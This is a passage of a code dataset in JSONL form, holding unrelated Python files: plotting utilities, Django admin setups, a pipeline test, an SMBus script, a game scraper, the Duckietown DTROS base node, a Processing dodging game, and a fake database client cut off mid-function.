d=steps*i+t)\n plot_bases(X_in[:4] @ R)\n plt.gcf().canvas.draw()\n # plt.savefig(f'/Users/atcold/Scratch/Spiral/in_out_per_transformation/{count:04d}.png')\n count += 1\n X_out = X_in[4:] @ R\n time.sleep(0.5)\n # for z in range(15):\n # plt.savefig(f'/Users/atcold/Scratch/Spiral/in_out_per_transformation/{count:04d}.png')\n # count += 1\n plot_bases(torch.cat((I * 0, I)), plotting=False)\n plt.gcf().canvas.draw()\n time.sleep(0.5)\n # for z in range(15):\n # plt.savefig(f'/Users/atcold/Scratch/Spiral/in_out_per_transformation/{count:04d}.png')\n # count += 1\n\n # Reflection?\n if torch.det(M) < 0:\n F = torch.pinverse(R) @ M\n X_in = torch.cat((I * 0, I, X_out))\n X_out = X_in @ F\n interpolate(X_in, X_out, y, steps, 'Reflecting', plotting_bases=True)\n X_out = X_out[4:]\n\n return X_out\n\n\ndef animate(module, X_in, y, steps, decompose=False):\n if isinstance(module, nn.Linear) and decompose:\n X_out = decompose_affine_transformation(module, X_in, y, steps)\n # X_out = in_out_interpolation(module, X_in, steps, module.__class__.__name__)\n else:\n X_out = in_out_interpolation(module, X_in, y, steps, module.__class__.__name__)\n return X_out\n\n\ndef decompose_affine_transformation(module, X_in, y, steps):\n A = module._parameters.get('weight').data # get tensor out of Parameter\n b = module._parameters.get('bias').data # get tensor out of Parameter\n U, S, V = torch.svd(A) # rotation, non-uniform scaling, rotation\n S = torch.diag(S) # A = U @ S @ V'\n steps = int(steps / 2)\n I = torch.eye(2)\n\n # Full affine transformation\n # X_out = X_in @ A' + b = X_in @ V @ S @ U' + b\n\n # Rotation 1\n X_out = interpolate_rot(X_in, y, steps, V)\n X_in = X_out\n\n # Scaling\n X_in = torch.cat((I * 0, I, X_in))\n X_out = X_in @ S\n interpolate(X_in, X_out, y, steps, 'Scaling', plotting_bases=True)\n X_in = X_out[4:]\n\n # Rotation 2\n X_out = interpolate_rot(X_in, y, steps, U.t())\n X_in = X_out\n\n # Translation\n X_in = torch.cat((I * 0, I, X_in))\n X_out = X_in + b\n 
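# Final stage of the affine decomposition A = U S V': animate the shift by the bias vector b.\n    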
interpolate(X_in, X_out, y, steps, 'Translating', plotting_bases=True)\n\n return X_out[4:]\n\n\ndef plot_output_decision(model, ratio):\n if ratio == '1:1': mesh = np.arange(-5.5, 5.5, 0.01)\n elif ratio == '16:9': mesh = np.arange(-10, 10, 0.01)\n else: raise ValueError('Ratio not supported')\n\n xx, yy = np.meshgrid(mesh, mesh)\n with torch.no_grad():\n data = torch.tensor(np.vstack((xx.reshape(-1), yy.reshape(-1))).T).float()\n output_layer_idx = list(model._modules.keys())[-1]\n Z = model._modules[output_layer_idx](data)\n Z = np.argmax(Z, axis=1).reshape(xx.shape)\n plt.contourf(xx, yy, Z, cmap=plt.cm.Spectral, alpha=0.3)\n\n\ndef play_in_out(model, X, y, steps, K=3, ratio='1:1', p=2):\n grid = get_grid(ratio=ratio)\n warm_up(X, y, grid, ratio=ratio)\n\n I = torch.eye(2)\n X_in_bak = torch.cat((I * 0, I, X, grid))\n X_in = X_in_bak\n for i in range(len(model._modules) - 1):\n module = model._modules[str(i)]\n with torch.no_grad():\n X_out = module(X_in)\n X_in = X_out\n interpolate(X_in_bak, X_out, y, steps, '', p=p, plotting_grid=True, K=K,\n ratio=ratio, single=True)\n\n\ndef play_layer_by_layer(model, X, y, steps, decompose=False):\n warm_up(X, y, plotting_bases=True)\n X_in = X\n for i in range(len(model._modules) - 1):\n module = model._modules[str(i)]\n X_in = animate(module, X_in, y, steps, decompose)\n\n\ndef warm_up(X, y, grid=None, plotting_bases=False, ratio='1:1'):\n # Warm up\n plt.gca().cla()\n plot_data(X, y, zoom=5, ratio=ratio)\n I = torch.eye(2)\n if plotting_bases: plot_bases(torch.cat((I * 0, I)))\n if grid is not None: plot_grid(grid)\n plt.gcf().canvas.draw()\n time.sleep(5)\n\n\ndef plot_output_data(model, X, y, ratio):\n X_in = X\n for i in range(len(model._modules) - 1):\n module = model._modules[str(i)]\n with torch.no_grad():\n X_out = module(X_in)\n X_in = X_out\n plot_data(X_out, y, ratio, zoom=5)\n\n\nzieger = plt.imread('ziegler.png')\n\n\ndef show_scatterplot(X, colors, title='', axis=True):\n colors = zieger[colors[:,0], colors[:,1]]\n X = X.numpy()\n # plt.figure()\n plt.axis('equal')\n plt.scatter(X[:, 0], X[:, 1], c=colors, s=30)\n # plt.grid(True)\n plt.title(title)\n plt.axis('off')\n _m, _c = 0, '.15'\n if axis:\n plt.axvline(0, ymin=_m, color=_c, lw=1, zorder=0)\n plt.axhline(0, xmin=_m, color=_c, lw=1, zorder=0)\n","sub_path":"part2/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":12936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"212935312","text":"from django.contrib import admin\n\n# Register your models here.\nfrom clubs.models import Club\n\n\nclass ClubAdmin(admin.ModelAdmin):\n fields = ['id', 'name', 'profile_medium', 'profile', 'cover_photo',\n 'cover_photo_small', 'description', 'club_type', 'sport_type',\n 'city', 'state', 'country', 'url', 'members']\n search_fields = ['name', 'description']\n ordering = ['name']\n list_display = ['id', 'name']\n\n\n\nadmin.site.register(Club, ClubAdmin)\n\n","sub_path":"StravaClub/clubs/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"249915166","text":"#!/usr/bin/env python3 -B\nimport unittest\n\nfrom tests import TestKnoedlerPipelineOutput, classified_identifiers, classification_sets\nfrom cromulent import vocab\n\nvocab.add_attribute_assignment_check()\n\nclass PIRModelingTest_AR86(TestKnoedlerPipelineOutput):\n def test_modeling_ar86(self):\n '''\n AR-86: Improve modeling of unsold 
purchases and inventorying\n        '''\n        output = self.run_pipeline('ar86')\n        activities = output['model-activity']\n\n        # There are three entries for this object (with transaction types \"unsold\", \"unsold\", and \"sold\").\n        # From these entries, we should see:\n        # - 1 purchase event (\"unsold\" but with seller information)\n        # - 2 inventorying events (\"unsold\" but no seller information, and also \"sold\" with no seller information)\n        # - 1 sale event (\"sold\")\n\n        k_purchases = [a for a in activities.values() if a.get('_label', '').startswith('Knoedler Purchase of Stock Number 5323')]\n        self.assertEqual(len(k_purchases), 1)\n\n        k_inventorying = [a for a in activities.values() if a.get('_label', '').startswith('Knoedler Inventorying of Stock Number 5323')]\n        self.assertEqual(len(k_inventorying), 2)\n\n        k_sales = [a for a in activities.values() if a.get('_label', '').startswith('Knoedler Sale of Stock Number 5323')]\n        self.assertEqual(len(k_sales), 1)\n\n        # Also, the two inventorying events should have price information representing Knoedler's evaluated worth of the object\n        # In this case, both inventorying activities resulted in the same evaluated amount (1250 francs).\n        for act in k_inventorying:\n            assignments = [a for a in act.get('part', []) if a.get('_label', '').startswith('Evaluated worth of Stock Number 5323')]\n            self.assertEqual(len(assignments), 1)\n            assignment = assignments[0]\n\n            self.assertTrue(assignment['_label'].startswith('Evaluated worth of Stock Number 5323'))\n            self.assertEqual(assignment['assigned_property'], 'dimension')\n            self.assertEqual(assignment['assigned'][0]['_label'], '1,250.00 francs')\n            self.assertEqual(assignment['assigned_to']['_label'], '[Language of fair title info from Sales Book 7, 1892-1900, f.36]')\n            self.assertEqual(classification_sets(assignment['assigned'][0]), {'Valuation'})\n\n\nif __name__ == '__main__':\n    unittest.main()\n","sub_path":"tests/test_knoedler_issue_ar86.py","file_name":"test_knoedler_issue_ar86.py","file_ext":"py","file_size_in_byte":2411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"355631519","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\n@author: root\n\"\"\"\n\nimport time\nfrom smbus2 import SMBus\nfrom smbus2 import SMBusWrapper \nfrom ctypes import *\n\ntgtAddress = 0x0B\nSBSCurrent = 0x0A\nSBSAveCurrent = 0x0B\n\nvoltcmd = 0x09\n\ndef printHex(data):\n    hexChar = ''\n    for val in data:\n        hexChar += '0x%02x ' % val\n    print(hexChar)\n\ncommObj = SMBus(2)\nif commObj is None:\n    print('Not able to open driver')\n    quit()\n\ncurList = list()\navecurList = list()\ncur = c_short()\nfor i in range(100): \n#    volts = commObj.read_word_data(tgtAddress, voltcmd)\n#    print('Voltage: ', volts)\n#    time.sleep(1.0)\n\n    commObj.write_i2c_block_data(tgtAddress, 0x44, [2,2,0])\n    verString = commObj.read_i2c_block_data(tgtAddress, 0x44, 13)\n#    print( ' '.join( [ \"%02x\" % ord (x) for x in verString ] ))\n\n#for x in verString:\n#    print('0x%x ' % x, end=\"\")\n\n\nprint('\\n')\n\n\ncommObj.close()\n","sub_path":"py/voltage.py","file_name":"voltage.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"541884717","text":"#-*- coding: utf-8 -*-\n\nfrom django.contrib import admin\nfrom profiles.models import *\n# Register your models here.\n\n\nclass PersonInline(admin.StackedInline):\n\tmodel = Profile\n\nclass AuthorAdmin(admin.ModelAdmin):\n    inlines = [\n        PersonInline\n    ]\n\n# The User model must be 
unregistered first so that it can be re-registered with the custom admin.\nadmin.site.unregister(User)\n\nadmin.site.register(User, AuthorAdmin)\nadmin.site.register(SearchWord)\nadmin.site.register(History)\n\n","sub_path":"profiles/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"196563535","text":"from bs4 import BeautifulSoup\nimport urllib2\n\n\"\"\"\nclient = MongoClient('localhost', 27017)\ndb = client.dnd\nitemCollection = db.items\n\"\"\"\n\nbase_url = 'http://dndtools.eu'\nitemURLs = []\nitems = []\n\n\n#finding all of the skill URLs\nreq = urllib2.Request(base_url + '/skills/?page_size=1000')\nres = urllib2.urlopen(req)\nsoup = BeautifulSoup(res.read())\nfor row in soup.findAll('tr'):\n    for link in row.findAll('a'):\n        itemURL = link.get('href')\n        if itemURL.find(\"/skills/\") != -1:\n            itemURLs.append(base_url + itemURL)\n\n\n#for string in itemURLs:\n#    print(string)\n\n\"\"\"\nfor url in itemURLs:\n    req = urllib2.Request(url)\n    res = urllib2.urlopen(req)\n    soup = BeautifulSoup(res.read())\n    curr_item = {}\n    tables = soup.findAll(\"table\")\n    for row in tables[0].findAll(\"tr\"):\n        row_name = \"\"\n        row_value = \"\"\n        if row.find(\"a\") : \n            row_name = row.find('a').text.encode(\"utf-8\")\n        else:\n            row_name = row.find(\"th\").text.encode(\"utf-8\").replace(\".\", \"\")\n        row_value = row.find(\"td\").text.encode(\"utf-8\").replace(\".\", \"\")\n        curr_item[row_name] = row_value\n    print curr_item[\"Name\"]\n    if tables[1].find('p') != None:\n        curr_item[\"Description\"] = tables[1].find('p').text\n#itemCollection.insert(curr_item)\n#items.append(curr_item)\n\"\"\"\n\nurl = itemURLs[0]\nreq = urllib2.Request(url)\nres = urllib2.urlopen(req)\nsoup = BeautifulSoup(res.read())\ncurr_item = {}\ntables = soup.findAll(\"table\")\nfor div in tables[0].findAll(\"div\"):\n    row_name = \"\"\n    row_value = \"\"\n    if div.find(\"a\"):\n        row_name = div.find('a').text.encode(\"utf-8\")\n    else:\n        row_name = div.find(\"th\").text.encode(\"utf-8\")\n    row_value = div.find(\"td\").text.encode(\"utf-8\")\n    curr_item[row_name] = row_value\n    \ncurr_item[\"Description\"] = tables[1].find('p').text\n#itemCollection.insert(curr_item) \nitems.append(curr_item)\n","sub_path":"python_troller/skills_html_parser.py","file_name":"skills_html_parser.py","file_ext":"py","file_size_in_byte":1907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"255754357","text":"import inspect\nimport os\nfrom pathlib import Path\nfrom typing import Optional\n\nimport rospy\nimport rospkg\nfrom copy import copy\nimport yaml\n\nfrom std_srvs.srv import SetBool, SetBoolResponse\nfrom duckietown_msgs.srv import (\n    NodeGetParamsList,\n    NodeGetParamsListResponse,\n    NodeRequestParamsUpdate,\n    NodeRequestParamsUpdateResponse,\n)\nfrom duckietown_msgs.msg import NodeParameter\nfrom duckietown.dtros.constants import (\n    NODE_GET_PARAM_SERVICE_NAME,\n    NODE_REQUEST_PARAM_UPDATE_SERVICE_NAME,\n    NODE_SWITCH_SERVICE_NAME,\n)\nfrom .dtparam import DTParam\nfrom .constants import NodeHealth, NodeType\nfrom .diagnostics import DTROSDiagnostics\nfrom .utils import get_ros_handler\nfrom .profiler import CodeProfiler\n\n\nclass DTROS(object):\n    \"\"\"\n    Parent class for all Duckietown ROS nodes\n\n    All Duckietown ROS nodes should inherit this class. This class provides\n    some basic common functionality that most of the ROS nodes need. 
By keeping\n    these arguments and methods in a parent class, we can ensure consistent and\n    reliable behaviour of all ROS nodes in the Duckietown universe.\n\n    In particular, the DTROS class provides:\n\n    - Logging: By providing utility functions for logging such as `loginfo`, `logwarn`, etc.\n    - Shutdown procedure: A common shutdown procedure for ROS nodes.\n    - Switchable Subscribers and Publishers: :py:meth:`publisher` and :py:meth:`subscriber` return\n      decorated subscribers and publishers that can be dynamically deactivated and reactivated.\n    - Node deactivation and reactivation: through requesting ``False`` to the ``~switch``\n      service all subscribers and publishers obtained through :py:meth:`publisher`\n      and :py:meth:`subscriber` will be deactivated and the ``switch`` attribute will be set\n      to ``False``. This switch can be\n      used by computationally expensive parts of the node code that are not in callbacks in\n      order to pause their execution.\n    - We look for a robot-specific parameter file and overwrite the default parameters\n      if it exists\n\n    Every child node should call the initializer of DTROS. This should be done\n    by having the following line at the top of the child node's ``__init__`` method::\n\n        super(ChildrenNode, self).__init__(node_name='children_node_name')\n\n    The DTROS initializer will:\n\n    - Initialize the ROS node with name ``node_name``\n    - Setup the ``node_name`` attribute to the node name passed by ROS (using ``rospy.get_name()``)\n    - Add a ``rospy.on_shutdown`` hook to the node's :py:meth:`onShutdown` method\n    - Setup a ``~switch`` service that can be used to deactivate and reactivate the node\n\n    Args:\n        node_name (:obj:`str`): a unique, descriptive name for the ROS node\n        node_type (:py:class:`duckietown.dtros.NodeType`): a node type\n        help (:obj: `str`): a node description\n        dt_ghost (:obj: `bool`): (Internal use only) excludes the node from the diagnostics\n\n    Attributes:\n        node_name (:obj:`str`): the name of the node\n        node_help (:obj:`str`): the description of the node\n        node_type (:py:class:`duckietown.dtros.NodeType`): the node type\n        is_shutdown (:obj:`bool`): whether the node is shutdown\n\n    Properties:\n        is_ghost: (:obj:`bool`): (Internal use only) whether the node is a ghost\n        switch: (:obj:`bool`): current state of the switch (`true=ON`, `false=OFF`)\n        parameters: (:obj:`list`): list of parameters defined within the node\n        subscribers: (:obj:`list`): list of subscribers defined within the node\n        publishers: (:obj:`list`): list of publishers defined within the node\n\n    Service:\n        ~switch:\n            Switches the node between active state and inactive state.\n\n            input:\n                data (`bool`): The desired state. 
``True`` for active, ``False`` for inactive.\n\n outputs:\n success (`bool`): ``True`` if the call succeeded\n message (`str`): Used to give details about success\n\n \"\"\"\n\n def __init__(\n self,\n node_name,\n # DT parameters from here\n node_type,\n pkg_name=None,\n help=None,\n dt_ghost=False,\n ):\n # configure singleton\n if rospy.__instance__ is not None:\n raise RuntimeError(\"You cannot instantiate two objects of type DTROS\")\n rospy.__instance__ = self\n if not isinstance(node_type, NodeType):\n raise ValueError(\n \"DTROS 'node_type' parameter must be of type 'duckietown.NodeType', \"\n \"got %s instead.\" % str(type(node_type))\n )\n # Initialize the node\n log_level = rospy.INFO\n if os.environ.get(\"DEBUG\", 0) in [\"1\", \"true\", \"True\", \"enabled\", \"Enabled\", \"on\", \"On\"]:\n log_level = rospy.DEBUG\n rospy.init_node(node_name, log_level=log_level, __dtros__=True)\n self.node_name = rospy.get_name()\n self.node_help = help\n self.node_type = node_type\n self.log(\"Initializing...\")\n self.is_shutdown = False\n self._is_ghost = dt_ghost\n self._health = NodeHealth.STARTING\n self._health_reason = None\n self._ros_handler = get_ros_handler()\n\n veh_name = self.node_name.split(\"/\")[1]\n robot_param_file = f\"{self.package_path}/config/{node_name}/{veh_name}.yaml\"\n if os.path.isfile(robot_param_file):\n rospy.loginfo(f\"[{self.package_name}] found robot specific parameter file.. loading\")\n try:\n with open(robot_param_file, \"r\") as stream:\n new_params = yaml.load(stream, Loader=yaml.Loader)\n except yaml.YAMLError:\n msg = f\"[{self.package_name}] Error in parsing calibration file {robot_param_file}.. skipping\"\n rospy.logerr(msg)\n rospy.signal_shutdown(msg)\n for key in new_params:\n rospy.set_param(f\"{node_name}/{key}\", new_params[key])\n\n # Initialize parameters handling\n self._parameters = dict()\n self._rh_paramUpdate = None\n if self._ros_handler is not None:\n # decorate the XMLRPC paramUpdate function\n self._rh_paramUpdate = self._ros_handler.paramUpdate\n setattr(self._ros_handler, \"paramUpdate\", self._param_update)\n\n # Handle publishers, subscribers, and the state switch\n self._switch = True\n self._subscribers = list()\n self._publishers = list()\n # create switch service for node\n self.srv_switch = rospy.Service(\"~%s\" % NODE_SWITCH_SERVICE_NAME, SetBool, self._srv_switch)\n # create services to manage parameters\n self._srv_get_params = rospy.Service(\n \"~%s\" % NODE_GET_PARAM_SERVICE_NAME, NodeGetParamsList, self._srv_get_params_list\n )\n self._srv_request_params_update = rospy.Service(\n \"~%s\" % NODE_REQUEST_PARAM_UPDATE_SERVICE_NAME,\n NodeRequestParamsUpdate,\n self._srv_request_param_update,\n )\n # register node against the diagnostics manager\n if DTROSDiagnostics.enabled():\n DTROSDiagnostics.getInstance().register_node(\n self.node_name, self.node_help, self.node_type, health=self._health\n )\n\n # provide a public interface to the context manager to use as `with self.profiler(\"PHASE\")`\n self.profiler = CodeProfiler()\n\n # mark node as healthy and STARTED\n self.set_health(NodeHealth.STARTED)\n # register shutdown callback\n rospy.on_shutdown(self._on_shutdown)\n\n # Read-only properties for the private attributes\n @property\n def is_ghost(self):\n \"\"\"Whether this is a ghost node (diagnostics will skip it)\"\"\"\n return self._is_ghost\n\n # Read-only properties for the private attributes\n @property\n def switch(self):\n \"\"\"Current state of the node on/off switch\"\"\"\n return self._switch\n\n 
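# Illustrative usage (hypothetical subclass, for orientation only): a node would call\n    #   super().__init__(node_name='my_node', node_type=NodeType.GENERIC)\n    # in its own __init__, then use self.loginfo(...) and the ~switch service described above.\n\n    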
@property\n def parameters(self):\n \"\"\"List of parameters\"\"\"\n return copy(list(self._parameters.values()))\n\n @property\n def subscribers(self):\n \"\"\"A list of all the subscribers of the node\"\"\"\n return self._subscribers\n\n @property\n def publishers(self):\n \"\"\"A list of all the publishers of the node\"\"\"\n return self._publishers\n\n @property\n def package_path(self) -> Optional[str]:\n \"\"\"The path to the catkin package this node belongs to\"\"\"\n # get all active locations where ROS packages are stored\n ROS_PACKAGE_PATH = os.environ.get(\"ROS_PACKAGE_PATH\", \"\")\n package_paths = ROS_PACKAGE_PATH.split(\":\")\n # get the path to the file containing the child class (whoever is inheriting from this class)\n try:\n child_class_path: str = os.path.realpath(inspect.getfile(self.__class__))\n except Exception as e:\n self.logwarn(f\"Could not determine the file hosting the subclass of DTROS. Error: {str(e)}\")\n return None\n # match the subclass path with the places where packages are stored\n for package_path in package_paths:\n package_path = os.path.realpath(package_path)\n if child_class_path.startswith(package_path):\n # we have a match\n return package_path\n return None\n\n @property\n def package_name(self) -> Optional[str]:\n \"\"\"The name of the catkin package this node belongs to\"\"\"\n package_path = self.package_path\n if not package_path:\n return None\n # the name of the package is simply the name of the directory containing it\n return Path(package_path).stem\n\n def set_health(self, health, reason=None):\n if not isinstance(health, NodeHealth):\n raise ValueError(\n \"Argument 'health' must be of type duckietown.NodeHealth. \"\n \"Got %s instead\" % str(type(health))\n )\n self.log(\"Health status changed [%s] -> [%s]\" % (self._health.name, health.name))\n self._health = health\n self._health_reason = None if reason is None else str(reason)\n # update node health in the diagnostics manager\n if DTROSDiagnostics.enabled():\n DTROSDiagnostics.getInstance().update_node(health=self._health, health_reason=self._health_reason)\n\n def log(self, msg, type=\"info\"):\n \"\"\"Passes a logging message to the ROS logging methods.\n\n Attaches the ros name to the beginning of the message and passes it to\n a suitable ROS logging method. 
Use the `type` argument to select the method\n to be used (``debug`` for ``rospy.logdebug``,\n ``info`` for ``rospy.loginfo``, ``warn`` for ``rospy.logwarn``,\n ``err`` for ``rospy.logerr``, ``fatal`` for ``rospy.logfatal``).\n\n Args:\n msg (`str`): the message content\n type (`str`): one of ``debug``, ``info``, ``warn``, ``err``, ``fatal``\n\n Raises:\n ValueError: if the ``type`` argument is not one of the supported types\n\n \"\"\"\n full_msg = \"[%s] %s\" % (self.node_name, msg)\n # pipe to the right logger\n if type == \"debug\":\n rospy.logdebug(full_msg)\n elif type == \"info\":\n rospy.loginfo(full_msg)\n elif type == \"warn\" or type == \"warning\":\n self.set_health(NodeHealth.WARNING, full_msg)\n rospy.logwarn(full_msg)\n elif type == \"err\" or type == \"error\":\n self.set_health(NodeHealth.ERROR, full_msg)\n rospy.logerr(full_msg)\n elif type == \"fatal\":\n self.set_health(NodeHealth.FATAL, full_msg)\n rospy.logfatal(full_msg)\n else:\n raise ValueError(\"Type argument value %s is not supported!\" % type)\n\n def loginfo(self, msg):\n self.log(msg, type=\"info\")\n\n def logerr(self, msg):\n self.log(msg, type=\"err\")\n\n def logfatal(self, msg):\n self.log(msg, type=\"fatal\")\n\n def logwarn(self, msg):\n self.log(msg, type=\"warn\")\n\n def logdebug(self, msg):\n self.log(msg, type=\"debug\")\n\n def on_switch_on(self):\n pass\n\n def on_switch_off(self):\n pass\n\n def _srv_switch(self, request):\n \"\"\"\n Args:\n request (:obj:`std_srvs.srv.SetBool`): The switch request from the ``~switch`` callback\n\n Returns:\n :obj:`std_srvs.srv.SetBoolResponse`: Response for successful feedback\n\n \"\"\"\n old_state = self._switch\n self._switch = new_state = request.data\n # propagate switch change to publishers and subscribers\n for pub in self.publishers:\n pub.active = self._switch\n for sub in self.subscribers:\n sub.active = self._switch\n # tell the node about the switch\n on_switch_fcn = {False: self.on_switch_off, True: self.on_switch_on}[self._switch]\n on_switch_fcn()\n # update node switch in the diagnostics manager\n if DTROSDiagnostics.enabled():\n DTROSDiagnostics.getInstance().update_node(enabled=self._switch)\n # create a response to the service call\n msg = \"Node switched from [%s] to [%s]\" % (\"on\" if old_state else \"off\", \"on\" if new_state else \"off\")\n # print out the change in state\n self.log(msg)\n # reply to the service call\n response = SetBoolResponse()\n response.success = True\n response.message = msg\n return response\n\n def _srv_get_params_list(self, request):\n \"\"\"\n Args:\n request (:obj:`duckietown_msgs.srv.NodeGetParamsList`): Service request message.\n\n Returns:\n :obj:`duckietown_msgs.srv.NodeGetParamsList`: Parameters list\n\n \"\"\"\n return NodeGetParamsListResponse(\n parameters=[\n NodeParameter(\n node=rospy.get_name(), name=p.name, help=p.help, type=p.type.value, **p.options()\n )\n for p in self.parameters\n ]\n )\n\n def _srv_request_param_update(self, request):\n \"\"\"\n Args:\n request (:obj:`duckietown_msgs.srv.NodeRequestParamsUpdate`): Service request message.\n\n Returns:\n :obj:`duckietown_msgs.srv.NodeRequestParamsUpdate`: Success feedback\n\n \"\"\"\n try:\n self._parameters[request.parameter].force_update()\n return NodeRequestParamsUpdateResponse(success=True)\n except (KeyError, rospy.exceptions.ROSException):\n return NodeRequestParamsUpdateResponse(success=False)\n\n def _param_update(self, *args, **kwargs):\n # call super method\n if self._rh_paramUpdate is not None:\n self._rh_paramUpdate(*args, 
**kwargs)\n # check data\n if len(args) < 3:\n self.logdebug(\"Received invalid paramUpdate call from Master\")\n return\n # get what changed\n _, param_name, param_value = args[:3]\n param_name = param_name.rstrip(\"/\")\n self.logdebug('Received paramUpdate(\"%s\", %s)' % (param_name, str(param_value)))\n # update parameter value\n if param_name in self._parameters:\n self._parameters[param_name].set_value(param_value)\n self.loginfo(\n 'Parameter \"%s\" has now the value [%s]'\n % (param_name, str(self._parameters[param_name].value))\n )\n\n def _add_param(self, param):\n if not isinstance(param, DTParam):\n raise ValueError(\"Expected type duckietown.DTParam, got %s instead\" % str(type(param)))\n self._parameters[param.name] = param\n\n def _has_param(self, param):\n return rospy.names.resolve_name(param) in self._parameters\n\n def _register_publisher(self, publisher):\n self._publishers.append(publisher)\n\n def _register_subscriber(self, subscriber):\n self._subscribers.append(subscriber)\n\n def _on_shutdown(self):\n self.log(\"Received shutdown request.\")\n self.is_shutdown = True\n # call node on_shutdown\n self.on_shutdown()\n\n def on_shutdown(self):\n # this function does not do anything, it is called when the node shuts down.\n # It can be redefined by the user in the final node class.\n pass\n","sub_path":"packages/duckietown/include/duckietown/dtros/dtros.py","file_name":"dtros.py","file_ext":"py","file_size_in_byte":16276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"272308900","text":"\"\"\"\nCreate a dodging game.\nEllipses will start at the top of the screen and \nfall downwards. \n\nThe Player controls the movement of an ellipse \nat the bottom of the screen using the mouse.\n\nThe player must dodge the falling ball\n\nSteps:\n 1. Create an ellipse with its own \n position variables. Draw it in the draw() function\n This will be the falling ball.\n 2. Make this ball \"fall\" by giving it a y-speed.\n Update its location in the draw() function.\n Also give it an x-speed, but keep it at 0\n (unless you want to mess around a bit).\n 3. When the ball hits the bottom of the screen,\n reset its position to the top of the window.\n You can assign the x-position to a random value.\n Maybe even assign the y-speed to a random value \n as well. Also, possibly create a second falling \n ball.\n 4. Create the PLAYER ellipse with its own position\n variables. The position of the PLAYER will update\n every draw loop. In the draw loop, bind the \n x-location variable to the mouseX variable.\n Keep this ball at the bottom of the screen. \n Draw this ball in the draw() function.\n This will be the player.\n 5. Whenever the ball hits the bottom, add +1 to a score\n variable. Draw this score with the text() function.\n 6. In the draw() function determine if the two\n ellipses are touching:\n a) Use pythagorean theorem to find out the \n distance (hypotenuse) between the two origins.\n b) check to see if the distance is less than \n the two ellipse radii. (Radiuses)\n 7. 
Whenever the falling ellipses touch the player, \n       reset the score.\n\"\"\"\nball_1_pos_x = 0\nball_1_pos_y = 0\nball_1_speed_x = 0\nball_1_speed_y = 3 # moving 3 pixels per frame\nball_1_size = 40\n\nplayer_pos_x = 0\nplayer_pos_y = 0\nplayer_size = 40\n\nbackground_color = color(39, 76, 119)\nprimary_color = color(96, 150, 186)\nsecondary_color = color(163, 206, 241)\n\nscore = 0\n\ndef setup():\n    size(400, 600)\n    \ndef draw():\n    global ball_1_pos_x\n    global ball_1_pos_y\n    global ball_1_speed_x\n    global ball_1_speed_y\n    global score\n    \n    # Update ball 1's location\n    ball_1_pos_y += ball_1_speed_y\n    \n    # Update player position based on mouse\n    player_pos_x = mouseX\n    player_pos_y = height - player_size/2\n    \n    if ball_1_pos_y > height:\n        ball_1_pos_y = 0\n        ball_1_pos_x = random(0, width)\n        score += 1\n    \n    # Collision detection.\n    # Using pythagorean theorem\n    radius_ball_1 = ball_1_size/2\n    radius_player = player_size/2\n    a = ball_1_pos_x - player_pos_x\n    b = ball_1_pos_y - player_pos_y\n    distance = sqrt(a**2 + b**2) # hypotenuse of the right-angle triangle\n    if distance <= radius_ball_1 + radius_player:\n        score = 0\n        ball_1_pos_y = 0\n        ball_1_pos_x = random(0, width)\n    \n    background(background_color) # Remove streaking\n    \n    #Draw ball 1\n    noStroke()\n    fill(secondary_color)\n    ellipse(ball_1_pos_x, ball_1_pos_y, ball_1_size, ball_1_size)\n    \n    # Draw score\n    fill(primary_color)\n    textSize(40)\n    textAlign(LEFT)\n    text(score, 20, 50)\n    \n    # Draw Player\n    fill(primary_color)\n    ellipse(player_pos_x, player_pos_y, player_size, player_size)\n","sub_path":"games/falling_ball_game/falling_ball_game_solution.pyde","file_name":"falling_ball_game_solution.pyde","file_ext":"pyde","file_size_in_byte":3215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"249763835","text":"# the class structure used for the User in the Mongo database\ntools_list = [{\n    \"_id\": {\n        \"$oid\": \"58e5528dbf24551abe30660f\"\n    },\n    \"current_user\": {\n        \"$oid\": \"58ebabe3638acc000b2e2429\"\n    },\n    \"name\": \"screwdriver\",\n    \"alternate_names\": [],\n    \"current_due_date\": 1492100080\n}, {\n    \"_id\": {\n        \"$oid\": \"58e5528dbf24551abe306610\"\n    },\n    \"current_due_date\": 1491424505,\n    \"name\": \"drill\",\n    \"alternate_names\": [],\n    \"current_user\": {\n        \"$oid\": \"58dfe761db78bb000bf7c88b\"\n    }\n}, {\n    \"_id\": {\n        \"$oid\": \"58e5528dbf24551abe306611\"\n    },\n    \"name\": \"arduino\",\n    \"alternate_names\": [],\n    \"current_due_date\": None,\n    \"current_user\": None\n}]\n\nusers_list = [{\n    \"_id\": {\n        \"$oid\": \"58ebabe3638acc000b2e2429\"\n    },\n    \"sender_id\": \"1346430625424620\",\n    \"tools\": [{\n        \"$oid\": \"58e5528dbf24551abe30660f\"\n    }],\n    \"stage\": 0,\n    \"temp_tools\": []\n}]\n\n\nclass User(object):\n    def __init__(self, sender_id):\n        self.sender_id = sender_id\n        self.tools = []\n        self.temp_tools = []\n        self.stage = 0\n\n\nclass FakeDatabaseClient(object):\n    \"\"\"A fake stand-in for the Mongo database client, used for testing without a live database.\"\"\"\n\n    def get_all_users(self):\n        \"\"\"Fake version of get_all_users.\"\"\"\n        return users_list\n\n    def get_all_tools(self):\n        \"\"\"Fake version of get_all_tools.\"\"\"\n        return tools_list\n\n    def find_user(self, field_name, field_value):\n        \"\"\"Fake version of find_user.\"\"\"\n        return None\n\n    def find_user_by_sender_id(self, sender_id):\n        \"\"\"Fake version of find_user_by_sender_id.\"\"\"\n        return None\n\n    def find_or_create_user(self, sender_id, name):\n        